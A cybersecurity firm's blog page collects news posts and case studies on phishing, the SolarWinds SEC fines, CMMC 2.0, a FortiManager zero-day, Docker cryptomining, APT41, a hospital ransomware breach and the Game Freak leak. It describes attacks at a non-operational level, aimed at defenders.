Netizen Blog and News

The Netizen team sharing expertise, insights and useful information in cybersecurity, compliance, and software assurance.

recent posts

about

  • Netizen Cybersecurity Bulletin (October 24th, 2024)

    Netizen Cybersecurity Bulletin (October 24th, 2024)

    Overview:

    • Phish Tale of the Week
    • SEC Fines Four Companies for Misleading Disclosures in SolarWinds Hack
    • CMMC 2.0 Program: Key Timeline for Defense Contractors
    • How can Netizen help?

    Phish Tale of the Week

    Often times phishing campaigns, created by malicious actors, target users by utilizing social engineering. For example, in this email, the actors are appearing as a university professor: Professor Johan H Enslin. The message tells us that they are seeking a research assistant to support our project, and that no previous experience is required. It seems both urgent and genuine, so why shouldn’t we send them our information? Luckily, there’s plenty of reasons that point to this being a scam.

    Here’s how we can tell not to fall for this phish:

    1. The first warning sign for this email is the sender’s email address. While the messaging tells you they are a professor, the sender tells a different story: “profjohanhenslin@gmail.com” is very clearly not a professor from a university like they want you to believe. Professors sending email in this way will almost always use their .edu email address.
    2. The second warning signs in this email is the messaging. The email seems almost too good to be true: remote work, a healthy weekly stipend, flexibility, everything a college student could want. If you’re seeing an email, and it seems to good to be true, it probably is. Scams like this targeting college students will commonly ask for your cell phone number/other personal information in this way in an attempt to gain PII from you.
    3. The final warning we have, and probably the easiest way to clock this as 100% a phishing email, is the signature. If we weren’t already convinced that the sender isn’t Professor Henslin, the signature tells us itself. Uygar Abaci, also without a .edu email, is now the one sending this to us. Perhaps the cybercriminal thought that adding two professors in the email would add credibility. In all seriousness, inconsistencies like this are by far the easiest way to detect a phishing email, and this final clue puts the nail in the coffin for this poor phishing attempt.


    General Recommendations:

    phishing attack will typically direct the user to click on a link where they will then be prompted to update personal information, such as a password, credit card, social security, or bank account information. A legitimate company already has this sensitive information and would not ask for it again, especially via your text messages. 

    1. Scrutinize your messages before clicking anything. Have you ordered anything recently? Does this order number match the one I already have? Did the message come from a store you don’t usually order supplies from or a service you don’t use? If so, it’s probably a phishing attempt.
    2. Verify that the sender is actually from the company sending the message.
    3. Did you receive a message from someone you don’t recognize? Are they asking you to sign into a website to give Personally Identifiable Information (PII) such as credit card numbers, social security number, etc. A legitimate company will never ask for PII via instant message or email.
    4. Do not give out personal or company information over the internet.
    5. Do not click on unrecognized links or attachments. If you do proceed, verify that the URL is the correct one for the company/service and it has the proper security in place, such as HTTPS.

    Many phishing messages pose a sense of urgency or even aggressiveness to prompt a form of intimidation. Any email requesting immediate action should be vetted thoroughly to determine whether or not it is a scam. Also, beware of messages that seek to tempt users into opening an attachment or visiting a link. For example, an attachment titled “Fix your account now” may draw the question “What is wrong with my account?” and prompt you to click a suspicious link.

    Cybersecurity Brief

    In this month’s Cybersecurity Brief:

    SEC Fines Four Companies for Misleading Disclosures in SolarWinds Hack

    The U.S. Securities and Exchange Commission (SEC) has imposed hefty fines on four major companies—Unisys Corp., Avaya Holdings Corp., Check Point Software Technologies Ltd., and Mimecast Limited—for failing to accurately disclose the impact of breaches linked to the notorious SolarWinds Orion cyberattack. The SEC’s actions highlight the growing regulatory scrutiny over how organizations handle cybersecurity disclosures, particularly in incidents involving widespread and damaging cyberattacks like SolarWinds.

    The SolarWinds hack, first revealed in late 2020, was a large-scale supply chain attack that compromised the networks of numerous government agencies and private companies worldwide. A vulnerability in SolarWinds’ Orion software allowed sophisticated hackers—widely attributed to Russian state-sponsored groups— to infiltrate systems and steal sensitive data. The ramifications of the breach rippled through the technology and security industries, raising concerns about the effectiveness of supply chain security and organizational transparency in reporting cybersecurity incidents.

    In this case, the SEC determined that Unisys, Avaya, Check Point, and Mimecast had downplayed the true extent of the breaches they experienced. According to the SEC, these companies misled shareholders and the public by minimizing the severity of the incidents, even though they knew attackers had accessed their systems via the SolarWinds vulnerability.

    Unisys, for example, suffered two breaches involving the exfiltration of gigabytes of data, yet continued to describe its cybersecurity risks as purely theoretical. This lack of transparency violated SEC regulations that require companies to provide accurate, timely disclosures about material events that could affect their business operations. As a result, Unisys faces the largest fine of $4 million.

    The SEC’s findings also revealed that Avaya misrepresented the scope of the breach it experienced, initially reporting that hackers had accessed only a limited number of email messages. In reality, the attackers had also accessed a much larger set of files stored in Avaya’s cloud environment.

    Check Point and Mimecast similarly issued vague and incomplete disclosures. Check Point was aware of the intrusion but did not clearly explain the nature or scope of the breach in its public statements. Mimecast, which had encrypted credentials stolen by the attackers, failed to disclose the full extent of the stolen data.

    The penalties issued by the SEC were as follows:

    • Unisys Corp.: $4 million
    • Avaya Holdings Corp.: $1 million
    • Check Point Software Technologies Ltd.: $995,000
    • Mimecast Limited: $990,000

    These fines reflect the SEC’s broader push to hold companies accountable for how they report cybersecurity incidents. As cyberattacks become more frequent and damaging, regulators are increasing pressure on businesses to ensure they are transparent about the risks and incidents they face. The SolarWinds hack, one of the most significant breaches in recent history, serves as a case study of how critical accurate and timely cybersecurity disclosures have become. The SEC’s actions in this case emphasize the importance of cybersecurity governance and the need for companies to maintain strong internal controls for managing and reporting cyber risks.

    To read more about this article, click here.

    CMMC 2.0 Program: Key Timeline for Defense Contractors

    On October 15, 2024, the U.S. Department of Defense (DOD) unveiled the final rule for the Cybersecurity Maturity Model Certification (CMMC) 2.0 Program. This pivotal update sets forth the guidelines for establishing cybersecurity standards aimed at safeguarding federal contract information (FCI) and controlled unclassified information (CUI). As the DOD prepares to implement this framework, understanding the timeline is crucial for defense contractors looking to remain competitive.

    The CMMC implementation will unfold in four distinct phases, starting after the related DFARS Acquisition rule takes effect. Each phase builds on the previous one, establishing escalating requirements for contractors:

    • Phase 1 (1 Year): This initial phase commences after the DFARS Acquisition rule takes effect. The DOD plans to require CMMC Status Level 1 (Self) or Level 2 (Self) in all applicable DOD solicitations and contracts as a condition of award. Contracting officers will also have the discretion to require CMMC Status Level 2 (C3PAO) for specific contracts. This phase provides contractors with a year to prepare for the initial compliance requirements.
    • Phase 2 (1 Year): Following Phase 1, the second phase will also last one year. During this period, the DOD will extend the CMMC requirements to include Level 1 (Self), Level 2 (Self), or Level 2 (C3PAO) in relevant solicitations and contracts. Contracting officers may choose to delay the requirement for CMMC Status Level 2 (C3PAO) to an option period. This allows additional time for contractors to adapt to the growing security expectations.
    • Phase 3 (1 Year): The third phase will mirror the previous two, lasting one year. In this phase, the DOD will mandate CMMC Status Level 1 and Level 2 (Self and C3PAO) for all applicable solicitations and contracts. Additionally, CMMC Status Level 3 (DIBCAC) may also be included as a requirement for certain contracts. As contractors prepare for this stage, they must ensure their cybersecurity practices align with the elevated standards.
    • Phase 4 (Full Implementation): Beginning three years from the effective date of the CMMC Acquisition rule, CMMC 2.0 will be fully implemented. At this point, all DOD contracts will require adherence to the appropriate CMMC levels, effectively reinforcing a culture of cybersecurity across the defense industrial base.

    The structured timeline allows contractors to progressively align their cybersecurity practices with the DOD’s requirements, emphasizing the necessity of preparation and compliance. As the phased approach unfolds, contractors will need to actively assess their cybersecurity measures, ensuring they meet the specified CMMC levels to be eligible for contract awards.

    To read more about this article, click here.

    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

  • Fortinet Warns of Critical FortiManager Flaw Exploited in Zero-Day Attacks

    Fortinet Warns of Critical FortiManager Flaw Exploited in Zero-Day Attacks

    Fortinet, a prominent cybersecurity company, has disclosed a critical vulnerability in its FortiManager API, tracked as CVE-2024-47575, which has been exploited in ongoing zero-day attacks. The flaw allows attackers to steal sensitive data, including configuration files, IP addresses, and credentials of managed devices.

    Fortinet began warning FortiManager customers privately about the issue on October 13th through emails outlining mitigation steps. However, news of the vulnerability started spreading online as customers shared their experiences on Reddit, and cybersecurity researcher Kevin Beaumont discussed it on Mastodon. Beaumont dubbed the vulnerability “FortiJump” after the attack method used by threat actors.

    Zero-Day Vulnerability in FortiManager

    This critical flaw has been rated 9.8 out of 10 in severity. According to Fortinet’s security advisory (FG-IR-24-423), the vulnerability stems from a missing authentication process in a critical function within the FortiManager fgfmd daemon. This flaw can allow an unauthenticated attacker to execute arbitrary code by sending specially crafted requests.

    The exploitation of this flaw requires attackers to first extract a valid certificate from a Fortinet device, such as a FortiManager VM. Once they have this certificate, they can exploit the vulnerability to gain access to sensitive systems.

    Affected Versions and Patches

    FortiManager versions affected by the vulnerability include:

    • FortiManager 7.6.0 and earlier (upgrade to 7.6.1 or later)
    • FortiManager 7.4.0 – 7.4.4 (upgrade to 7.4.5 or later)
    • FortiManager 7.2.0 – 7.2.7 (upgrade to 7.2.8 or later)
    • FortiManager 7.0.0 – 7.0.12 (upgrade to 7.0.13 or later)
    • FortiManager 6.4.0 – 6.4.14 (upgrade to 6.4.15 or later)
    • FortiManager 6.2.0 – 6.2.12 (upgrade to 6.2.13 or later)
    • FortiManager Cloud versions 7.0.0 to 7.4.4 are also affected.

    At the time of disclosure, only patches for FortiManager versions 7.2.8 and 7.4.5 had been released, with patches for other versions expected in the coming days.

    Attack Method: Exploiting the FortiGate to FortiManager Protocol

    The vulnerability revolves around the FortiGate to FortiManager Protocol (FGFM), which allows FortiGate firewall devices to register with FortiManager servers for centralized management. FGFM is commonly used in setups where network address translation (NAT) is employed, allowing FortiGate units to communicate securely with FortiManager over public and private networks.

    As noted by Beaumont, attackers can exploit this protocol by using a stolen certificate to establish an SSL tunnel between a compromised FortiGate device and an exposed FortiManager server. Once connected, attackers can execute code remotely, access configurations, and potentially escalate their privileges across managed devices.

    Early Exploitation and Delayed Notification

    Fortinet customers have reported that their systems were breached even before the company issued private warnings. A now-deleted Reddit post mentioned that one customer had been attacked weeks before receiving the notification email from Fortinet, indicating that the vulnerability had been actively exploited for some time.

    Fortinet’s delayed public disclosure and the absence of a clear, timely advisory have left many administrators scrambling to secure their systems. As more customers report similar attacks, there is growing frustration within the community over the lack of transparency and prompt action by Fortinet.

    Protecting Your Systems

    Fortinet advises all customers to upgrade their FortiManager installations to the latest patched versions as soon as possible. With the vulnerability actively being exploited in the wild, these updates are critical to safeguarding networks from further attacks. Customers should also review their systems for any unauthorized devices or unusual activity, particularly related to SSL tunnel connections.

    Fortinet’s response to the CVE-2024-47575 vulnerability highlights the importance of staying vigilant and promptly applying security updates, especially in critical network management tools like FortiManager.

    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. As part of our commitment to supporting businesses in their compliance journey, we offer CMMC (Cybersecurity Maturity Model Certification) preparation services. Our team assists organizations in understanding the CMMC requirements and developing the necessary controls to meet compliance standards, ensuring they are well-prepared for CMMC assessments.

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

    Questions or concerns? Feel free to reach out to us any time –

    https://www.netizen.net/contact

  • gRPC/h2c Protocol Abuse Enables XRP Cryptomining via Docker Servers

    gRPC/h2c Protocol Abuse Enables XRP Cryptomining via Docker Servers

    Threat actors are exploiting Docker remote API servers for cryptomining, with a particular focus on mining XRP, a cryptocurrency designed for quick, low-cost international transfers. As the native token of the Ripple network, XRP supports a blockchain-based payment protocol that enables real-time, cross-border transactions for financial institutions, making it an attractive target for malicious actors seeking to profit from its value.

    The attackers in this case are taking advantage of gRPC over h2c (clear-text HTTP/2), which allows them to bypass common security defenses. gRPC, designed for efficient communication between services, is leveraged here for malicious purposes.

    Breakdown of Attack Steps

    1. Initial Access and API Probing:
      • The attacker begins by pinging the Docker server to check its availability. Once they confirm access, they send a version check request (Figure 3) to identify the Docker version in use. This step is crucial because it helps the attacker understand whether the server is running a version susceptible to their method of exploitation. A version with known vulnerabilities or misconfigurations is highly advantageous for the attacker.
    2. Exploiting gRPC/h2c for Command Execution:
      • After verifying that the target is vulnerable, the attacker initiates a gRPC protocol upgrade (Figure 4), upgrading the connection to HTTP/2 over clear text (h2c). This upgrade evades many security tools that primarily monitor traditional HTTP traffic and do not account for protocol changes. gRPC’s support for high-performance, bi-directional communication becomes an asset to the attacker, allowing them to communicate with the Docker server covertly.
    3. Advanced gRPC Methods for Full Control:
      • The attacker then makes use of several gRPC methods, which are part of Docker’s API, to manage the server. These include:
        • Health checks (/grpc.health.v1.Health/Check and /grpc.health.v1.Health/Watch), which ensure that the attacker’s actions do not disrupt the Docker environment in a way that would raise suspicion. These methods allow continuous monitoring of the health status of Docker containers.
        • File Synchronization (/moby.filesync.v1.FileSync/DiffCopy and /moby.filesync.v1.FileSync/TarStream), used to transfer and synchronize files between the attacker’s server and the Docker host. This enables efficient deployment of malicious software, with minimal data transfer.
        • Authentication Management (/moby.filesync.v1.Auth/Credentials and /moby.filesync.v1.Auth/FetchToken), allowing the attacker to manipulate authentication tokens. By gaining control of these tokens, they ensure persistent access to the Docker environment.
    4. Cryptominer Deployment:
      • With the Docker server fully compromised, the attacker downloads the SRBMiner cryptominer from GitHub. SRBMiner is specifically designed for mining various cryptocurrencies, including XRP, using system resources for illicit purposes. Once installed, the miner is connected to the attacker’s cryptocurrency wallet and public IP address, effectively hijacking the server’s computational power to generate XRP for the attacker.

    Impact of the Attack

    This cryptomining operation places significant strain on compromised Docker environments. Cryptomining activities classically consume large amounts of CPU and GPU resources, resulting in degraded performance for legitimate applications running on the same server. This can lead to operational inefficiencies, increased cloud hosting costs, and potentially raise suspicion if the degradation in service is noticed by users or administrators.

    Furthermore, the attack demonstrates a growing trend of targeting cloud infrastructures. Docker, widely used for its flexibility in building and deploying containerized applications, has become an attractive target for cybercriminals due to the increasing number of misconfigured and exposed Docker APIs. By exploiting gRPC/h2c in this attack, the adversaries also highlight a gap in many organizations’ security postures, particularly regarding modern communication protocols.

    Detecting the Docker Attack

    Detecting an attack on Docker remote API servers, like the SRBMiner cryptominer deployment, involves monitoring for several key indicators. First, network traffic analysis should be conducted to detect unusual or unauthorized requests to the Docker API, particularly attempts to upgrade to gRPC/h2c protocols. Since this is not a default method for Docker communication, such requests can be flagged as suspicious. Additionally, regular auditing of CPU, memory, and disk usage can reveal abnormal resource consumption patterns typical of cryptomining activity. Any unexpected spikes in system performance, especially related to Docker containers, should trigger further investigation. Intrusion detection systems (IDS) or endpoint detection and response (EDR) solutions can also be configured to identify unusual API calls, such as those related to file synchronization, health checks, or unauthorized authentication token management. Finally, implementing access controls and logging API activity can help detect and trace any unauthorized access attempts or malicious changes in real-time.

    Further Security Considerations

    The use of clear text HTTP/2 (h2c) in this attack underscores the need for organizations to implement encrypted communication channels like TLS for all remote API access. This would prevent attackers from upgrading to insecure protocols without detection.

    In addition, intrusion detection systems (IDS) should be configured to detect protocol upgrades, particularly from HTTP to gRPC or h2c, as this can often indicate an attempt to bypass standard security filters. Network segmentation is another key defense in this situation—limiting access to critical infrastructure like Docker APIs to trusted IPs or internal networks can significantly reduce exposure.

    Lastly, organizations should regularly audit Docker API configurations and monitor for unusual network traffic or system resource usage spikes. Detecting cryptomining activity early is key to minimizing damage and preventing attackers from gaining a foothold.

    By targeting poorly secured Docker APIs and using advanced techniques like gRPC/h2c, attackers can gain control of cloud resources and deploy cryptominers with relative ease. Strengthening Docker security through proper API configurations, TLS, access controls, and proactive monitoring is essential in defending against these threats.

    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. As part of our commitment to supporting businesses in their compliance journey, we offer CMMC (Cybersecurity Maturity Model Certification) preparation services. Our team assists organizations in understanding the CMMC requirements and developing the necessary controls to meet compliance standards, ensuring they are well-prepared for CMMC assessments.

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

    Questions or concerns? Feel free to reach out to us any time –

    https://www.netizen.net/contact

  • Netizen: Monday Security Brief (10/21/2024)

    Netizen: Monday Security Brief (10/21/2024)

    Today’s Topics:

    • Microsoft Issues Urgent Warning to Apple Users: Critical Update Required to Address “HM Surf” Vulnerability
    • Chinese Nation-State Hackers APT41 Target Gambling Sector for Financial Gain
    • How can Netizen help?

    Microsoft Issues Urgent Warning to Apple Users: Critical Update Required to Address “HM Surf” Vulnerability

    In a recent announcement, Microsoft has alerted millions of Apple users about a serious security threat dubbed “HM Surf.” This vulnerability poses significant risks, particularly for those using macOS devices managed through a Mobile Device Management (MDM) setup, primarily targeting enterprise environments rather than individual home users./

    The HM Surf vulnerability exploits a bypass in the Transparency, Consent, and Control (TCC) framework within Safari. TCC is designed to protect user data, including sensitive information accessed via the device’s camera, microphone, and location services. However, the flaw allows attackers to gain unauthorized access to this data without the user’s consent, effectively circumventing the protective measures intended to safeguard user privacy.

    Microsoft discovered that this exploit could enable malicious actors to covertly:

    • Capture continuous video from the device’s camera.
    • Record audio through the microphone and transmit it to remote servers.
    • Retrieve sensitive information about the device’s location.
    • Manipulate Safari’s interface to operate discreetly without drawing attention.

    Microsoft has advised all macOS users to promptly update their devices to protect against this vulnerability. The flaw has been identified as CVE-2024-44133, and Apple has addressed it as part of its security updates for macOS Sequoia, released on September 16, 2024. Users are urged to apply these updates immediately to mitigate potential risks.

    In their statement, Microsoft emphasized the urgency: “We encourage macOS users to apply these security updates as soon as possible.” The update not only fortifies Safari against this specific vulnerability but also strengthens overall privacy controls within macOS.

    According to Microsoft, the vulnerability arises because Apple retains certain private entitlements for its applications, including Safari. These entitlements grant Safari extensive permissions that allow it to bypass standard TCC checks, unlike third-party browsers such as Google Chrome or Mozilla Firefox, which are required to request user permissions explicitly for accessing sensitive features.

    The implications of this are profound; if Safari is exploited, it can operate with elevated access that other browsers do not possess. Consequently, this creates a potential threat landscape for macOS users, particularly in enterprise settings where sensitive data is routinely handled.

    In response to this vulnerability, Apple has taken steps to harden Safari’s security, including restrictions on modifying configuration files that could enable such exploits. Microsoft has also announced its collaboration with other major browser vendors to enhance the security of their local configuration files. While efforts are underway for browsers based on Chromium and Firefox to adopt improved security measures, Safari users must prioritize applying the latest updates to their devices.

    For users who may have questions or require further assistance, it is advisable to consult the official Apple support channels or cybersecurity experts to ensure comprehensive protection against emerging threats.

    To read more about this article, click here.

    Chinese Nation-State Hackers APT41 Target Gambling Sector for Financial Gain

    A sophisticated cyber attack attributed to the Chinese nation-state actor APT41 has recently targeted the gambling and gaming industry, leading to significant concerns about data security and financial implications. The hacking campaign, which spanned approximately six months, involved stealthily gathering sensitive information such as network configurations, user passwords, and critical secrets from the LSASS (Local Security Authority Subsystem Service) process.

    Ido Naor, co-founder and CEO of Security Joes, emphasized the attackers’ adaptability during the intrusion. They continuously updated their tools based on the security team’s responses, demonstrating a high level of skill and methodical planning. The attack, which lasted nearly nine months, aligns with previous intrusions identified by cybersecurity vendor Sophos as part of Operation Crimson Palace.

    Naor noted that these attacks are often influenced by state-sponsored agendas, with a high degree of confidence that APT41 was motivated by financial gain this time. The attackers employed a multi-faceted approach, utilizing a custom toolset designed to bypass existing security measures while harvesting critical information and establishing covert channels for persistent remote access.

    The initial access vector for this attack remains unidentified, but evidence suggests it may have involved spear-phishing emails, given the lack of active vulnerabilities in publicly accessible web applications. Once inside the target’s network, the attackers executed a DCSync attack aimed at harvesting password hashes from service and admin accounts, allowing them to expand their access and maintain control over the network.

    APT41’s techniques included:

    • Phantom DLL Hijacking: A method that allows attackers to manipulate DLLs (Dynamic Link Libraries) to execute malicious payloads.
    • Use of wmic.exe: The legitimate Windows Management Instrumentation Command-line utility was abused to execute commands indirectly, facilitating the download of additional malware.

    The next stage of the attack involved retrieving a malicious DLL file named TSVIPSrv.dll over the SMB protocol, which then established contact with a hard-coded command-and-control (C2) server. If the connection failed, the implant would scrape GitHub for user information to update its C2 details, showcasing a unique technique to maintain operational flexibility.

    After being detected, the threat actors remained silent for several weeks before returning with a revised strategy. They executed heavily obfuscated JavaScript code within a modified XSL file (texttable.xsl), utilizing the wmic.exe command to load and execute malicious code. This JavaScript served as a downloader, contacting a secondary C2 server to retrieve more malware while fingerprinting the infected system.

    Security Joes observed that the malware specifically targeted machines within certain subnets, indicating a focused approach to compromise only valuable devices. This was achieved through filtering mechanisms that ensured only specific targets were affected, particularly those connected to the organization’s VPN.

    To read more about this article, click here.

    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

  • Case Study: 2023 Cyberattack on Lehigh Valley Health Network

    Case Study: 2023 Cyberattack on Lehigh Valley Health Network

    Overview

    In early February 2023, Lehigh Valley Health Network (LVHN) fell victim to a cyberattack orchestrated by the ransomware group BlackCat, which has been linked to Russian cybercriminals. The attack, which was detected on February 6, revealed a breach of sensitive data, specifically targeting the Lehigh Valley Physician Group-Delta Medix. This incident raised immediate concerns about the security of patient information and the effectiveness of the healthcare network’s cybersecurity measures.

    The breach was a sophisticated operation typical of BlackCat, which is known for its ability to exploit vulnerabilities in healthcare systems. Upon detection, LVHN initiated a multi-faceted response. This included engaging with cybersecurity experts to conduct a thorough investigation, containing the ransomware, and alerting law enforcement authorities. Despite these efforts, the incident highlighted systemic vulnerabilities within the organization, as it revealed the extent of compromised patient data.

    Ransomware attacks like this are becoming increasingly common, especially in healthcare, where patient information is critical. BlackCat employed a tactic called “triple extortion,” meaning they not only encrypted LVHN’s data but also threatened to leak sensitive information and launch denial-of-service (DoS) attacks to disrupt services. These tactics put immense pressure on organizations to consider paying the ransom. However, LVHN decided against it, which led to the release of sensitive photos online, raising serious ethical concerns and impacting the trust of their patients.

    Impact

    The breach impacted the personal information of numerous patients, with LVHN later disclosing that compromised data varied by individual. It potentially included names, addresses, phone numbers, medical record numbers, treatment details, and health insurance information. More alarmingly, the breach also involved sensitive clinical information, including current procedural terminology (CPT) codes, which can detail specific diagnoses and treatments.

    In some cases, the data theft extended to email addresses, banking information, Social Security numbers, and clinical images of patients undergoing treatment. The loss of clinical images is particularly concerning, as these records can reveal intimate details of a patient’s health status, treatment history, and personal identifiers.

    Following the breach, LVHN took immediate steps to notify affected individuals and offered a complimentary 24-month subscription to Experian’s IdentityWorks service to help monitor potential misuse of their personal information. The organization sent out notification letters that included instructions for activating this membership, acknowledging the stress and concern such an incident can cause.

    In its public statements, LVHN assured the community of its commitment to data protection. They expressed deep regret for any inconvenience caused by the incident, stating, “We are committed to data protection and deeply regret any concern or inconvenience this incident may have caused.” However, the organization faced a dual challenge: managing the technical fallout while maintaining public trust.

    Despite the cyberattack, LVHN reported that its core operations continued without disruption, indicating that its emergency response protocols were somewhat effective. However, the breach’s occurrence during a time of heightened digital health adoption highlighted the increased vulnerability of healthcare systems to cyber threats, especially as more patient data is managed electronically.

    The implications of the breach extended far beyond immediate operational concerns. LVHN faced significant financial repercussions as the incident’s fallout led to a series of lawsuits. By September 2024, LVHN reached a $65 million settlement with victims affected by the data breach, a figure that reflects not only the direct costs associated with managing the aftermath but also the long-term impacts on the organization’s reputation and trustworthiness.

    Healthcare organizations often grapple with the delicate balance between safeguarding sensitive data and maintaining operational efficiency. LVHN’s experience exemplifies how the costs associated with a cyber incident can escalate rapidly, leading to financial strain and potential losses in patient trust.

    What Can Be Learned From This?

    Several key lessons can be drawn from this incident, which may help other organizations strengthen their defenses against similar threats.

    End-user awareness remains the first line of defense against cyberattacks. As demonstrated by the tactics employed by BlackCat, human error often serves as an entry point for attackers. Regular training sessions—ideally quarterly—focused on cybersecurity best practices can empower employees to recognize phishing attempts, exercise caution with email attachments, and understand the significance of maintaining strong passwords. These proactive measures can dramatically reduce the risk of successful attacks.

    Given that attackers may obtain user credentials, deploying MFA is crucial for enhancing security. By requiring additional verification—such as a text message or a secondary authentication app—organizations can protect sensitive data even in the event of credential theft. This layer of security is relatively easy to implement and can significantly reduce the chances of unauthorized access.

    Proper network segmentation can limit the spread of malware within an organization. By isolating critical systems and restricting access based on necessity, healthcare providers can contain potential breaches more effectively. Additionally, adhering to the principle of least privilege ensures that users have only the access necessary for their roles, further reducing the potential attack surface.

    Organizations should leverage security monitoring tools, such as Wazuh, to enhance their threat detection capabilities. By continuously monitoring network traffic and system logs, these tools can identify suspicious activities in real-time, enabling swift incident response. Moreover, integrating threat intelligence feeds can provide valuable insights into emerging threats, allowing organizations to proactively adjust their defenses.

    While it is impossible to prevent all breaches, having a well-defined incident response plan can minimize the impact of an attack. This plan should outline roles and responsibilities, establish communication protocols, and include strategies for data recovery and mitigation. Regular testing and updates to the plan ensure that all personnel are prepared to act decisively in the event of a cybersecurity incident.

    Healthcare organizations must prioritize the protection of patient data by implementing robust encryption, regular audits, and compliance with relevant regulations. This commitment not only safeguards sensitive information but also helps to maintain patient trust in the organization.

    Conclusion

    As cyber threats continue to evolve, the lessons learned from LVHN’s experience can help shape future strategies for protecting sensitive patient information and ensuring the resilience of healthcare systems. By fostering a culture of cybersecurity awareness, investing in the right technologies, and implementing robust incident response plans, healthcare organizations can better safeguard against the pervasive threat of cyberattacks.

    In a landscape where patient data security is paramount, taking proactive steps is not just advisable; it is essential for maintaining the trust and safety of patients and the integrity of the healthcare system as a whole.

  • Pokémon’s ‘Teraleak’: 25 Years of Secrets Unveiled in Massive Game Freak Hack

    Pokémon’s ‘Teraleak’: 25 Years of Secrets Unveiled in Massive Game Freak Hack

    In a major security breach, Pokémon developer Game Freak has reportedly suffered what’s being referred to as a “teraleak,” releasing more than 25 years of never-before-seen Pokémon art, assets, and confidential documents. First reported by Nintendo Life, this massive leak includes a treasure trove of concept art, internal development materials, and even plans for canceled movies. The breach, which Game Freak confirmed occurred in August 2024, has left employee names and contact information compromised, though the scope of stolen intellectual property appears to go far beyond that.

    What Was Stolen?

    According to reports circulating on social media, including the PokeLeaks subreddit and posts from Pokémon leak aggregator CentroLeaks, the stolen material includes:

    • Work-in-progress sprites from Generation 3, 4, and 5 Pokémon games
    • Concept art for the 1997 Pokémon anime
    • Detailed background lore on the Pokémon universe
    • Meeting minutes from a discussion on Ash Ketchum’s final story arc
    • Early development pitches for Detective Pikachu 2 and a mystery project titled “Game Boy”
    • Codenames for future hardware, including “Ounce,” thought to be associated with the next Nintendo console, the Switch 2

    This information flood mirrors the 2020 “gigaleak” suffered by Nintendo, which exposed significant amounts of legacy data. The volume and range of content, dubbed the “teraleak,” have sparked extensive discussion and speculation across multiple platforms.

    PII and Design Materials Compromised

    A significant amount of personally identifiable information (PII) was exposed in the Game Freak breach. According to Game Freak’s October 10th statement, the names and company email addresses of 2,606 current and former employees, as well as external contractors, were compromised. This includes personal information related to both employees and individuals working with the company, although there’s no mention of more sensitive data like social security numbers or home addresses being involved.

    Game Freak has confirmed that it is contacting those affected by the breach, and there is speculation that phishing might have played a role in enabling the attack. However, beyond this employee-related information, much of the focus of the leak has been on the stolen Pokémon design materials and internal development documents. However, the company has yet to officially confirm that any Pokémon design materials were part of the stolen data. Given the nature of the breach, some suspect that Game Freak may be refraining from acknowledging the leaked creative assets to avoid further legitimizing the stolen material.

    Was Phishing Involved?

    Online speculation has pointed to phishing as a possible method of access. Many users believe that one of Game Freak’s employees may have been tricked by a phishing scam, which granted the attacker entry into the company’s servers. This theory is gaining traction, especially given the gap between the August breach and the October leak of massive amounts of confidential data.

    What’s Next?

    While Game Freak has taken steps to rebuild its server infrastructure, the implications of the leak are still unfolding. Many speculate that the August breach may have been a precursor to the larger-scale leak now dominating headlines. The long-term effects of this “teraleak” on Game Freak’s projects, along with potential legal actions against those sharing the stolen information, remain to be seen.

    Game Freak now joins the ranks of major game companies like Nintendo and Rockstar, which have both suffered high-profile security breaches in recent years. As more data continues to surface, it’s clear that the ramifications of this breach will resonate throughout the Pokémon community (and beyond) for quite some time.

    How Can Netizen Help?

